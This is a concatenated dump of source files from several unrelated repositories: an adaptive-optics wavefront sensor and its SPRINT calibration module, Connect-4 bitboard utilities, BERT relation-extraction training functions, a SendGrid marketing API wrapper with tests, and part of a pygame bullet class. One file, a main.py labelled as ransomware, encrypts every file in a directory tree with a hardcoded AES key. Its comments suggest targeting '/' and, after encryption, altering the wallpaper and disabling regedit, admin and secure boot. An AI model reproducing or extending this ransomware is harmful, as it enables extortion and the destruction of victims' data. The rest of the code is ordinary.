res_y = (np.gradient(arr,axis=0)/self.telescope.pixelSize)*self.telescope.pupil
return res_x,res_y
def lenslet_propagation_geometric(self,arr):
[SLx,SLy] = self.gradient_2D(arr)
sx = (bin_ndarray(SLx, [self.nSubap,self.nSubap], operation='mean'))
sy = (bin_ndarray(SLy, [self.nSubap,self.nSubap], operation='mean'))
return np.concatenate((sx,sy))
#%% self Measurement
def sh_measure(self,phase_in = None):
if phase_in is not None:
self.telescope.src.phase = phase_in
if self.is_geometric is False:
if np.ndim(self.telescope.src.phase)==2:
# reset camera frame
self.camera_frame = np.zeros([self.n_pix_subap*(self.nSubap),self.n_pix_subap*(self.nSubap)], dtype =float)
def compute_diffractive_signals():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.lenslet_propagation_diffractive)(i,j,k) for i,j,k in zip(self.cube,self.index_x,self.index_y))
return Q
self.maps_intensity = np.asarray(compute_diffractive_signals())
self.SX[self.validLenslets_x,self.validLenslets_y] = self.sx[self.validLenslets_x,self.validLenslets_y]
self.SY[self.validLenslets_x,self.validLenslets_y] = self.sy[self.validLenslets_x,self.validLenslets_y]
self.signal = np.concatenate([self.sx[self.validLenslets_x,self.validLenslets_y],self.sy[self.validLenslets_x,self.validLenslets_y]])/self.slopes_units
self.signal_2D = np.concatenate([self.SX,self.SY])
self.signal_2D[np.isnan(self.signal_2D)] = 0
self*self.cam
else:
# set phase buffer
self.phase_buffer = np.moveaxis(self.telescope.src.phase_no_pupil,-1,0)
# reset camera frame
self.camera_frame = np.zeros([self.phase_buffer.shape[0],self.n_pix_subap*(self.nSubap),self.n_pix_subap*(self.nSubap)], dtype =float)
def compute_diffractive_signals_multi():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.get_lenslet_phase_buffer)(i) for i in self.phase_buffer)
return Q
self.maps_intensity = np.reshape(np.asarray(compute_diffractive_signals_multi()),[self.phase_buffer.shape[0]*np.sum(self.valid_subapertures_1D),16,16])
norma = self.maps_intensity.shape[1]
F = np.abs(np.fft.fft2(self.maps_intensity)/norma)**2
F_binned = (bin_ndarray(F, [F.shape[0],self.n_pix_subap,self.n_pix_subap], operation='sum'))
if self.cam.photonNoise!=0:
rs = np.random.RandomState(seed=int(time.time()))
F_binned = rs.poisson(F_binned)
if self.cam.readoutNoise!=0:
F_binned += np.int64(np.round(np.random.randn(F_binned.shape[0],F_binned.shape[1],F_binned.shape[2])*self.cam.readoutNoise))
def joblib_centroid():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.centroid)(i) for i in F_binned)
return Q
if self.get_camera_frame_multi is True:
self.compute_camera_frame_multi(F_binned)
self.centroid_multi = np.asarray(joblib_centroid())
self.signal_2D = np.zeros([self.phase_buffer.shape[0],self.nSubap*2,self.nSubap])
for i in range(self.phase_buffer.shape[0]):
self.SX[self.validLenslets_x,self.validLenslets_y] = self.centroid_multi[i*self.nValidSubaperture:(i+1)*self.nValidSubaperture,0]
self.SY[self.validLenslets_x,self.validLenslets_y] = self.centroid_multi[i*self.nValidSubaperture:(i+1)*self.nValidSubaperture,1]
signal_2D = np.concatenate((self.SX,self.SY)) - self.reference_slopes_maps
signal_2D[~self.valid_slopes_maps] = 0
self.signal_2D[i,:,:] = signal_2D/self.slopes_units
self.signal = self.signal_2D[:,self.valid_slopes_maps].T
self*self.cam
else:
if np.ndim(self.telescope.src.phase)==2:
self.signal_2D = self.lenslet_propagation_geometric(self.telescope.src.phase_no_pupil)*self.valid_slopes_maps/self.slopes_units
self.signal = self.signal_2D[self.valid_slopes_maps]
else:
self.phase_buffer = np.moveaxis(self.telescope.src.phase_no_pupil,-1,0)
def compute_diffractive_signals():
Q=Parallel(n_jobs=1,prefer='processes')(delayed(self.lenslet_propagation_geometric)(i) for i in self.phase_buffer)
return Q
maps = compute_diffractive_signals()
self.signal_2D = np.asarray(maps)/self.slopes_units
self.signal = self.signal_2D[:,self.valid_slopes_maps].T
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% WFS PROPERTIES %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
@property
def is_geometric(self):
return self._is_geometric
@is_geometric.setter
def is_geometric(self,val):
self._is_geometric = val
if hasattr(self,'isInitialized'):
if self.isInitialized:
print('Re-initializing WFS...')
self.initialize_wfs()
@property
def lightRatio(self):
return self._lightRatio
@lightRatio.setter
def lightRatio(self,val):
self._lightRatio = val
if hasattr(self,'isInitialized'):
if self.isInitialized:
print('Selecting valid subapertures based on flux considerations..')
self.valid_subapertures = np.reshape(self.photon_per_subaperture >= self.lightRatio*np.max(self.photon_per_subaperture), [self.nSubap,self.nSubap])
self.valid_subapertures_1D = np.reshape(self.valid_subapertures,[self.nSubap**2])
[self.validLenslets_x , self.validLenslets_y] = np.where(self.photon_per_subaperture_2D >= self.lightRatio*np.max(self.photon_per_subaperture))
# index of valid slopes X and Y
self.valid_slopes_maps = np.concatenate((self.valid_subapertures,self.valid_subapertures))
# number of valid lenslet
self.nValidSubaperture = int(np.sum(self.valid_subapertures))
self.nSignal = 2*self.nValidSubaperture
print('Re-initializing WFS...')
self.initialize_wfs()
print('Done!')
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% WFS INTERACTIONS %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def __mul__(self,obj):
if obj.tag=='detector':
obj.frame = self.camera_frame
else:
print('Error light propagated to the wrong type of object')
return -1
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% END %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def show(self):
attributes = inspect.getmembers(self, lambda a:not(inspect.isroutine(a)))
print(self.tag+':')
for a in attributes:
if not(a[0].startswith('__') and a[0].endswith('__')):
if not(a[0].startswith('_')):
if not np.shape(a[1]):
tmp=a[1]
try:
print(' '+str(a[0])+': '+str(tmp.tag)+' object')
except:
print(' '+str(a[0])+': '+str(a[1]))
else:
if np.ndim(a[1])>1:
print(' '+str(a[0])+': '+str(np.shape(a[1])))
```
#### File: OOPAO/AO_modules/SPRINT.py
```python
from AO_modules.mis_registration_identification_algorithm.estimateMisRegistration import estimateMisRegistration
from AO_modules.mis_registration_identification_algorithm.computeMetaSensitivyMatrix import computeMetaSensitivityMatrix
from AO_modules.MisRegistration import MisRegistration
from AO_modules.calibration.CalibrationVault import calibrationVault
import numpy as np
class SPRINT:
def __init__(self,obj, basis, nameFolder = None, nameSystem = None, mis_registration_zero_point = None, wfs_mis_registered= None, fast_algorithm = False, n_iteration = 3):
print('Setting up SPRINT..')
# modal basis considered
self.basis = basis
# consider the case when only one signal is used
if len(basis.indexModes)==1:
self.basis.indexModes = [basis.indexModes,basis.indexModes]
self.basis.modes = np.asarray([basis.modes,basis.modes]).T
# Case where the shifts are applied in the WFS space
self.wfs_mis_registered = wfs_mis_registered
# fast version of the algorithm (WARNING: not stable)
self.fast_algorithm = fast_algorithm
# zero point for the sensitivity matrices
if mis_registration_zero_point is None:
self.mis_registration_zero_point = MisRegistration()
else:
self.mis_registration_zero_point = mis_registration_zero_point
# epsilon mis-registration for the computation of the directional gradients
self.epsilonMisRegistration = MisRegistration()
self.epsilonMisRegistration.shiftX = np.round(obj.dm.pitch /10,4)
self.epsilonMisRegistration.shiftY = np.round(obj.dm.pitch /10,4)
self.epsilonMisRegistration.rotationAngle = np.round(np.rad2deg(np.arctan(self.epsilonMisRegistration.shiftX)/(obj.tel.D/2)),4)
# folder name to save the sensitivity matrices
if nameFolder is None:
self.nameFolder_sensitivity_matrice = obj.param['pathInput'] +'/'+ obj.param['name']+'/s_mat/'
else:
self.nameFolder_sensitivity_matrice = nameFolder
# name of the system considered
if nameSystem is None:
self.name_system = ''
else:
self.name_system = nameSystem
# pre-compute the sensitivity matrices
[self.metaMatrix,self.calib_0] = computeMetaSensitivityMatrix(nameFolder = self.nameFolder_sensitivity_matrice,\
nameSystem = self.name_system,\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
pitch = obj.dm.pitch,\
wfs = obj.wfs,\
basis = basis,\
misRegistrationZeroPoint = self.mis_registration_zero_point,\
epsilonMisRegistration = self.epsilonMisRegistration,\
param = obj.param,\
wfs_mis_registrated = wfs_mis_registered)
print('Done!')
def estimate(self,obj,on_sky_slopes, n_iteration = 3):
"""
Method of SPRINT to estimate the mis-registrations parameters
- obj : a class containing the different objects, tel, dm, atm, ngs and wfs
_ on_sky_slopes : the wfs signal used to identify the mis-registration parameters
_ n_iteration : the number of iterations to consider
exemple:
Sprint.estimate(obj, my_wfs_signal, n_iteration = 3)
The estimation are available using:
Sprint.mis_registration_out.shift_x ---- shift in m
Sprint.mis_registration_out.shift_y ---- shift in m
Sprint.mis_registration_out.rotation ---- rotation in degree
"""
if np.ndim(on_sky_slopes)==1:
calib_misReg_in = calibrationVault(np.squeeze(np.asarray([on_sky_slopes.T,on_sky_slopes.T]).T))
else:
calib_misReg_in = calibrationVault(on_sky_slopes)
[self.mis_registration_out ,self.scaling_factor ,self.mis_registration_buffer] = estimateMisRegistration( nameFolder = self.nameFolder_sensitivity_matrice,\
nameSystem = self.name_system,\
tel = obj.tel,\
atm = obj.atm,\
ngs = obj.ngs,\
dm_0 = obj.dm,\
calib_in = calib_misReg_in,\
wfs = obj.wfs,\
basis = self.basis,\
misRegistrationZeroPoint = self.mis_registration_zero_point,\
epsilonMisRegistration = self.epsilonMisRegistration,\
param = obj.param,\
precision = 5,\
return_all = True,\
nIteration = n_iteration,\
fast = self.fast_algorithm,\
wfs_mis_registrated = self.wfs_mis_registered,\
sensitivity_matrices = self.metaMatrix )
``` |
{
"source": "joaoavf/connect-x",
"score": 4
} |
#### File: connect-x/engine/utils.py
```python
import numpy as np
def translate_board(board):
"""Translate a 42 items flat list into a 6x7 numpy array.
Parameters:
board (list): 42 items (not nested) mapping the board (0: Empty, 1: Player 1, 2: Player 2)
Returns:
(np.array): 6x7 board mapped by (0: Empty, 1: Player 1, 2: Player 2)"""
return np.array(board).reshape(6, 7).tolist()
def connected_four(bit_board):
"""Evaluates if player bit board has made a connect 4.
Parameters:
bit_board (int): bit board representation of player pieces the game
Returns:
bool : True if the board has achieved a connect 4"""
# Horizontal check
m = bit_board & (bit_board >> 7)
if m & (m >> 14):
return True
# Diagonal \
m = bit_board & (bit_board >> 6)
if m & (m >> 12):
return True
# Diagonal /
m = bit_board & (bit_board >> 8)
if m & (m >> 16):
return True
# Vertical
m = bit_board & (bit_board >> 1)
if m & (m >> 2):
return True
# Nothing found
return False
def get_position_mask_bitmap(board, player):
"""Transform a 6x7 board representation into bit boards.
Parameters:
board (np.array): 6x7 board mapped by (0: Empty, 1: Player 1, 2: Player 2)
Returns:
(int, int) : (bit board of player pieces, bit board of all pieces)"""
player_pieces, mask = b'', b''
for j in range(6, -1, -1): # Start with right-most column
mask += b'0' # Add 0-bits to sentinel
player_pieces += b'0'
for i in range(0, 6): # Start with bottom row
mask += [b'0', b'1'][board[i][j] != 0]
player_pieces += [b'0', b'1'][board[i][j] == player]
return int(player_pieces, 2), int(mask, 2)
def generate_plays(mask, order_by_mid=False):
"""Generate a list with all the possible plays in a given round.
Parameters:
mask (int): binary representation (bit board) of all pieces
Returns:
List : bit value of all available plays"""
position_map = [2 ** i for i in range(49)] # List of a binary representation of individual pieces in the board
available_plays = []
for column_number in range(7):
column_values = position_map[7 * column_number: 7 * column_number + 6] # Minus extra cell on top of the board
for value in column_values:
if mask & value == 0:
available_plays.append(value)
break
if order_by_mid:
available_plays = [available_plays.pop(i // 2) for i in reversed(range(len(available_plays)))]
return available_plays
def transform_play_to_column(play):
"""Return position of the column where the play was made.
Parameters:
play (int): bit board representation of a piece
Returns:
int : column position"""
return [2 ** i for i in range(49)].index(play) // 7
``` |
{
"source": "Joao-b4/ransomware-py",
"score": 3
} |
#### File: Joao-b4/ransomware-py/main.py
```python
from Crypto.Cipher import AES
from Crypto.Util import Counter
import argparse
import os
import Discover
import Crypter
#------------------
# a senha pode ter os seguintes tamanhos
# 128/192/256 -
# senha de 32 caracteres
#------------------
HARDCODED_KEY = 'bot4BypassYourAllServersInSystem'
def get_parser():
parser = argparse.ArgumentParser(description="bot4Crypter")
parser.add_argument("-d", "--decrypt", help="decripta os arquivos [default: no]", action="store_true")
return parser
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args["decrypt"]
if decrypt:
print("""
RANSOMWARE B4
----------------------------------
DECRYPT KEY = '{}'
""".format(HARDCODED_KEY))
key = input("Digite a senha > ")
else:
if HARDCODED_KEY:
key = HARDCODED_KEY
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
if not decrypt:
cryptFn = crypt.encrypt
else:
cryptFn = crypt.decrypt
init_path = os.path.abspath(os.path.join(os.getcwd(), "files"))
start_dirs = [init_path] # passar '/' para percorrer todo o sistema
for currentDIr in start_dirs:
for filename in Discover.discover(currentDIr):
Crypter.change_files(filename, cryptFn)
#sobreescreve a chave na memoria
for _ in range(100):
pass
if not decrypt:
#codigo malicioso aqui
pass
#apos a encriptação, pode-se alterar o wallpaper
#alterar os icones, desativar o regedit, admin, bios secure boot, etc
if __name__ == "__main__":
main()
``` |
{
"source": "joaobarbirato/BERT-Relation-Extraction",
"score": 2
} |
#### File: src/tasks/train_funcs.py
```python
import os
import math
import torch
import torch.nn as nn
from ..misc import save_as_pickle, load_pickle
from seqeval.metrics import precision_score, recall_score, f1_score
import logging
from tqdm import tqdm
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', \
datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logger = logging.getLogger(__file__)
def load_state(net, optimizer, scheduler, args, load_best=False):
""" Loads saved model and optimizer states if exists """
base_path = "./data/"
amp_checkpoint = None
checkpoint_path = os.path.join(base_path,"task_test_checkpoint_%d.pth.tar" % args.model_no)
best_path = os.path.join(base_path,"task_test_model_best_%d.pth.tar" % args.model_no)
start_epoch, best_pred, checkpoint = 0, 0, None
if (load_best == True) and os.path.isfile(best_path):
checkpoint = torch.load(best_path)
logger.info("Loaded best model.")
elif os.path.isfile(checkpoint_path):
checkpoint = torch.load(checkpoint_path)
logger.info("Loaded checkpoint model.")
if checkpoint != None:
start_epoch = checkpoint['epoch']
best_pred = checkpoint['best_acc']
net.load_state_dict(checkpoint['state_dict'])
if optimizer is not None:
optimizer.load_state_dict(checkpoint['optimizer'])
if scheduler is not None:
scheduler.load_state_dict(checkpoint['scheduler'])
amp_checkpoint = checkpoint['amp']
logger.info("Loaded model and optimizer.")
return start_epoch, best_pred, amp_checkpoint
def load_results(model_no=0):
""" Loads saved results if exists """
losses_path = "./data/task_test_losses_per_epoch_%d.pkl" % model_no
accuracy_path = "./data/task_train_accuracy_per_epoch_%d.pkl" % model_no
f1_path = "./data/task_test_f1_per_epoch_%d.pkl" % model_no
f1_micro_path = "./data/task_test_f1_nonseq_micro_per_epoch_%d.pkl" % model_no
f1_macro_path = "./data/task_test_f1_nonseq_macro_per_epoch_%d.pkl" % model_no
test_accuracy_path = "./data/task_test_accuracy_per_epoch_%d.pkl" % model_no
precision_recall_micro_path = "./data/task_test_precision_recall_micro_per_epoch_%d.pkl" % model_no
precision_recall_macro_path = "./data/task_test_precision_recall_macro_per_epoch_%d.pkl" % model_no
report_path = "./data/task_report_per_epoch_%d.pkl" % model_no
if os.path.isfile(losses_path) and os.path.isfile(accuracy_path) and os.path.isfile(f1_path) \
and os.path.isfile(f1_micro_path) and os.path.isfile(f1_macro_path) and os.path.isfile(test_accuracy_path):
losses_per_epoch = load_pickle("task_test_losses_per_epoch_%d.pkl" % model_no)
accuracy_per_epoch = load_pickle("task_train_accuracy_per_epoch_%d.pkl" % model_no)
f1_per_epoch = load_pickle("task_test_f1_per_epoch_%d.pkl" % model_no)
f1_micro_per_epoch = load_pickle("task_test_f1_per_epoch_%d.pkl" % model_no)
f1_macro_per_epoch = load_pickle("task_test_f1_per_epoch_%d.pkl" % model_no)
test_accuracy_per_epoch = load_pickle("task_test_f1_per_epoch_%d.pkl" % model_no)
precision_recall_micro_per_epoch = load_pickle("task_test_precision_recall_micro_per_epoch_%d.pkl" % model_no)
precision_recall_macro_per_epoch = load_pickle("task_test_precision_recall_macro_per_epoch_%d.pkl" % model_no)
report_per_epoch = load_pickle("task_report_per_epoch_%d.pkl" % model_no)
logger.info("Loaded results buffer")
else:
losses_per_epoch, accuracy_per_epoch, f1_per_epoch, f1_micro_per_epoch, \
f1_macro_per_epoch, test_accuracy_per_epoch, precision_recall_micro_per_epoch, \
precision_recall_macro_per_epoch, report_per_epoch = [], [], [], [], [], [], [], [], []
return losses_per_epoch, accuracy_per_epoch, f1_per_epoch, f1_micro_per_epoch, \
f1_macro_per_epoch, test_accuracy_per_epoch, precision_recall_micro_per_epoch, \
precision_recall_macro_per_epoch, report_per_epoch
def evaluate_(output, labels, ignore_idx):
### ignore index 0 (padding) when calculating accuracy
idxs = (labels != ignore_idx).squeeze()
o_labels = torch.softmax(output, dim=1).max(1)[1]
l = labels.squeeze()[idxs]; o = o_labels[idxs]
try:
if len(idxs) > 1:
acc = (l == o).sum().item()/len(idxs)
else:
acc = (l == o).sum().item()
except TypeError: # len() of a 0-d tensor
acc = (l == o).sum().item()
l = l.cpu().numpy().tolist() if l.is_cuda else l.numpy().tolist()
o = o.cpu().numpy().tolist() if o.is_cuda else o.numpy().tolist()
return acc, (o, l)
def convert_cr_idx2rel(cr):
rm = load_pickle("relations.pkl")
new_cr = {}
general_metrics = ['accuracy', 'macro avg', 'weighted avg']
for gm in general_metrics:
new_cr[gm] = cr[gm]
for k, v in cr.items():
if not k in general_metrics:
new_cr[rm.idx2rel[int(k)].replace('\n', '')] = cr[k]
return cr
from sklearn.metrics import precision_recall_fscore_support, accuracy_score, classification_report
def evaluate_results(net, test_loader, pad_id, cuda):
logger.info("Evaluating test samples...")
acc = 0; out_labels = []; true_labels = []
net.eval()
with torch.no_grad():
for i, data in tqdm(enumerate(test_loader), total=len(test_loader)):
x, e1_e2_start, labels, _,_,_ = data
attention_mask = (x != pad_id).float()
token_type_ids = torch.zeros((x.shape[0], x.shape[1])).long()
if cuda:
x = x.cuda()
labels = labels.cuda()
attention_mask = attention_mask.cuda()
token_type_ids = token_type_ids.cuda()
classification_logits = net(x, token_type_ids=token_type_ids, attention_mask=attention_mask, Q=None,\
e1_e2_start=e1_e2_start)
accuracy, (o, l) = evaluate_(classification_logits, labels, ignore_idx=-1)
out_labels.append([str(i) for i in o]); true_labels.append([str(i) for i in l])
acc += accuracy
accuracy = acc/(i + 1)
results = {
"accuracy": accuracy,
"precision": precision_score(true_labels, out_labels),
"recall": recall_score(true_labels, out_labels),
"f1": f1_score(true_labels, out_labels)
}
# converting relation specific metrics from ids to labels
cr = convert_cr_idx2rel(classification_report(
y_true=[tl for batch in true_labels for tl in batch],
y_pred=[pl for batch in out_labels for pl in batch],
output_dict=True
))
test_accuracy = cr['accuracy']
results_non_seq_macro = {
"precision": cr['macro avg']['precision'],
"recall": cr['macro avg']['recall'],
"f1": cr['macro avg']['f1-score']
}
p_micro, r_micro, f_micro, _ = precision_recall_fscore_support(
y_true=[tl for batch in true_labels for tl in batch],
y_pred=[pl for batch in out_labels for pl in batch],
average='micro',
zero_division=0
)
results_non_seq_micro = {
"precision": p_micro,
"recall": r_micro,
"f1": f_micro
}
test_accuracy = accuracy_score(
y_true=[tl for batch in true_labels for tl in batch],
y_pred=[pl for batch in out_labels for pl in batch],
)
logger.info("***** Eval results *****")
for key in sorted(results.keys()):
# logger.info(" %s = %s", key, str(results[key]))
if key != 'accuracy':
logger.info(f'test {key}(micro, macro) = ({results_non_seq_micro[key]:.3f},{results_non_seq_macro[key]:.3f})')
else:
logger.info(f'{key} (training) = {results[key]:.3f}')
return results, results_non_seq_micro, results_non_seq_macro, test_accuracy, cr
``` |
{
"source": "joaobarbirato/EscolaApp-Web",
"score": 2
} |
#### File: EscolaApp-Web/escolaappweb_dashboard/get_api.py
```python
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.http import JsonResponse
from escolaappweb_dashboard.models import (
Turma,
Materia,
Pai,
Aluno,
get_all
)
"""
get_api
Funções que retornam JSON com todos os dados de modelos específicos.
As APIs serão úteis para a aplicação mobile.
"""
# __queryset_to_jsondict
# formata uma queryset para um dicionario a ser mandado como json
# @queryset: queryset
def __queryset_to_jsondict(queryset):
dict_all = {}
for i in range(queryset.count()):
dict_all[str(queryset[i].id)] = queryset.values()[i]
return dict_all
# get JSON
## modelo Turma
def get_json_turma(request):
all_objects = get_all(Turma)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
## modelo Materia
def get_json_materia(request):
all_objects = get_all(Materia)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
## modelo Pai
def get_json_pai(request):
all_objects = get_all(Pai)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
## modelo Aluno
def get_json_aluno(request):
all_objects = get_all(Aluno)
response = JsonResponse(__queryset_to_jsondict(all_objects))
response.status_code = 200
return response
``` |
{
"source": "joaobarbosa/sendgrid-marketing-api",
"score": 3
} |
#### File: sendgrid-marketing-api/sendgridmarketingapi/campaigns.py
```python
class CampaignsManager(object):
"""Campaigns Manager - All campaign methos are available trough this class.
All methods here can raise SendGrid exceptions:
SendGridClientError, SendGridServerError
Args:
client: instance of SGMarketingClient
"""
ENDPOINT = '/campaigns'
def __init__(self, wrapper):
self.wrapper = wrapper
def get_all_campaigns(self, limit=10, offset=0):
"""Get All Campaigns
Args:
limit: (int) Maximum number of results (SendGrid API default: 10)
offset: (int) Starting index, where 0 is the first (default: 0)
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Get-all-Campaigns-GET
"""
get = {}
if limit > 0:
get = {'limit': limit, 'offset': 0}
return self.wrapper.get(endpoint=CampaignsManager.ENDPOINT, **get)
def create_campaign(self, title, **params):
"""Create Campaign
Args:
title: (str) Campaign title (max. of 100 characters)
**params:
subject: (str) (optional) Email subject
sender_id: (int) (optional) Sender ID
list_ids: (dict) (optional) List IDs
segment_ids: (dict) (optional) Segment IDs
categories: (dict) (optional) List of categories
suppression_group_id: (int) (optional) Suppression Group ID
custom_unsubscribe_url: (str) (optional) Custom unsubscribe URL
ip_pool: (str) (optional) IP pool
html_content: (str) (optional) Email content in HTML
plain_content: (str) (optional) Email content in plain text
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Create-a-Campaign-POST
"""
params['title'] = title
return self.wrapper.post(endpoint=CampaignsManager.ENDPOINT, **params)
def update_campaign(self, campaign_id, **params):
"""Update Campaign
Note: you can only update campaigns in DRAFT mode.
Args:
campaign_id: (int) Campaign ID
**params:
title: (str) (optional) Title
subject: (str) (optional) Email subject
sender_id: (int) (optional) Sender ID
list_ids: (dict) (optional) List IDs
segment_ids: (dict) (optional) Segment IDs
categories: (dict) (optional) List of categories
suppression_group_id: (int) (optional) Suppression Group ID
custom_unsubscribe_url: (str) (optional) Custom unsubscribe URL
ip_pool: (str) (optional) IP pool
html_content: (str) (optional) Email content in HTML
plain_content: (str) (optional) Email content in plain text
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Update-a-Campaign-PATCH
"""
return self.wrapper.patch(
endpoint='%s/%d' % (CampaignsManager.ENDPOINT, campaign_id),
**params
)
def get_campaign(self, campaign_id):
"""Get All Campaigns
Args:
campaign_id: (int) Campaign ID
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#View-a-Campaign-GET
"""
return self.wrapper.get(
endpoint='%s/%d' % (CampaignsManager.ENDPOINT, campaign_id)
)
def send_campaign(self, campaign_id):
"""Send a Campaign
Args:
campaign_id: (int) Campaign ID
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Send-a-Campaign-POST
"""
return self.wrapper.post(
endpoint='%s/%d/%s' % (
CampaignsManager.ENDPOINT, campaign_id, '/schedules/now'
)
)
def schedule_campaign(self, campaign_id, timestamp):
"""Schedule a Campaign
Args:
campaign_id: (int) Campaign ID
timestamp: (int) Timestamp relative to a future date
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Schedule-a-Campaign-POST
"""
return self.wrapper.post(
endpoint='%s/%d/%s' % (
CampaignsManager.ENDPOINT, campaign_id, '/schedules/'
), params={'send_at': timestamp}
)
def update_schedule_campaign(self, campaign_id, timestamp):
"""Update scheduled time of a campaing
Args:
campaign_id: (int) Campaign ID
timestamp: (int) Timestamp relative to a future date
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html
#Update-a-Scheduled-Campaign-PATCH
"""
return self.wrapper.patch(
endpoint='%s/%d/%s' % (
CampaignsManager.ENDPOINT, campaign_id, '/schedules/'
), params={'send_at': timestamp}
)
def delete_campaign(self, campaign_id):
"""Delete Campaigns
Args:
campaign_id: (int) Campaign ID
Reference: https://sendgrid.com/docs/API_Reference/Web_API_v3
/Marketing_Campaigns/campaigns.html#Delete-a-Campaign-DELETE
"""
return self.wrapper.delete(
endpoint='%s/%d' % (CampaignsManager.ENDPOINT, campaign_id)
)
```
#### File: sendgrid-marketing-api/sendgridmarketingapi/wrapper.py
```python
from .exceptions import UnknownRequestMethodException
from urllib import urlencode
import sendgrid
class API(object):
"""Workaround for using SendGrid official API client.
Args:
endpoint: string representing a valid API endpoint, like '/campaings'
"""
def __init__(self, endpoint):
self.endpoint = endpoint
class SendGridClientWrapper(object):
"""SendGridClientWrapper - Custom client, relies on the official client
Args:
api_key: Your SendGrid API key
"""
HOST = 'https://api.sendgrid.com/v3'
(METHOD_GET, METHOD_POST, METHOD_PATCH, METHOD_DELETE) = (1, 2, 3, 4)
def __init__(self, apikey):
self.sg_client = sendgrid.SendGridAPIClient(
apikey=apikey,
host=SendGridClientWrapper.HOST
)
def _call(self, api_endpoint, method, data=None):
"""Execute request in the official client
Args:
api_endpoint: (API) instance of API class with endpoint set
method: (int) method for the request
"""
if method == SendGridClientWrapper.METHOD_GET:
return self.sg_client.get(api_endpoint)
if method == SendGridClientWrapper.METHOD_POST:
return self.sg_client.post(api_endpoint, data)
if method == SendGridClientWrapper.METHOD_PATCH:
return self.sg_client.patch(api_endpoint, data)
if method == SendGridClientWrapper.METHOD_DELETE:
return self.sg_client.delete(api_endpoint)
raise UnknownRequestMethodException('Unknown request method.')
def get(self, endpoint, **params):
"""Execute a GET request
Args:
endpoint: (str) valid API endpoint, like '/campaings'
params: (dict) url parameters
"""
if params:
qs = urlencode(params)
endpoint = endpoint + '?' + qs
return self._call(API(endpoint), SendGridClientWrapper.METHOD_GET)
def post(self, endpoint, **params):
"""Execute a POST request
Args:
endpoint: (str) valid API endpoint, like '/campaings'
params: (dict) post data
"""
return self._call(
API(endpoint),
SendGridClientWrapper.METHOD_POST,
params
)
def patch(self, endpoint, **params):
"""Execute a PATCH request
Args:
endpoint: (str) valid API endpoint, like '/campaings'
params: (dict) post data
"""
return self._call(
API(endpoint),
SendGridClientWrapper.METHOD_PATCH,
params
)
def delete(self, endpoint):
"""Execute a DELETE request
Args:
endpoint: (str) valid API endpoint, like '/campaings/{id}'
"""
return self._call(
API(endpoint),
SendGridClientWrapper.METHOD_DELETE
)
```
#### File: sendgrid-marketing-api/tests/test_01_wrapper.py
```python
from sendgridmarketingapi.wrapper import SendGridClientWrapper, API
from sendgridmarketingapi.exceptions import UnknownRequestMethodException
from sendgrid.exceptions import SendGridClientError
import json
import pytest
VALID_ENDPOINT = '/campaigns'
INVALID_ENDPOINT = '/invalid-endpoint'
VALID_GET_PARAMS = {'limit': 100, 'offset': 0}
class TestWrapper():
def test_instantiation_api(self):
with pytest.raises(TypeError):
API()
api = API('/endpoint')
assert api.endpoint is '/endpoint'
def test_instantiation(self, valid_api_key):
with pytest.raises(TypeError):
SendGridClientWrapper()
with pytest.raises(SendGridClientError):
wrapper = SendGridClientWrapper('wrong-key')
status, data = wrapper.get(endpoint=VALID_ENDPOINT)
response_json = json.loads(data)
assert status == 401
assert 'errors' in response_json
wrapper = SendGridClientWrapper(valid_api_key)
status, data = wrapper.get(endpoint=VALID_ENDPOINT)
assert status == 200
def test_get(self, valid_wrapper):
status, data = valid_wrapper.get(
endpoint=VALID_ENDPOINT,
params=VALID_GET_PARAMS
)
assert status == 200
with pytest.raises(SendGridClientError):
status, data = valid_wrapper.get(
endpoint=INVALID_ENDPOINT
)
assert status == 404
def test_call_unknown_request(self, valid_api_key):
wrapper = SendGridClientWrapper(valid_api_key)
with pytest.raises(UnknownRequestMethodException):
wrapper._call(api_endpoint=VALID_ENDPOINT, method=99)
``` |
{
"source": "JoaoBatistaJr/Cuso-Intensivo-de-Python-Projeto-Pygame-Aliens",
"score": 4
} |
#### File: JoaoBatistaJr/Cuso-Intensivo-de-Python-Projeto-Pygame-Aliens/bullet.py
```python
import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
"""Uma classe que administra projéteis disparados pela espaçonave"""
def __init__(self, ai_game):
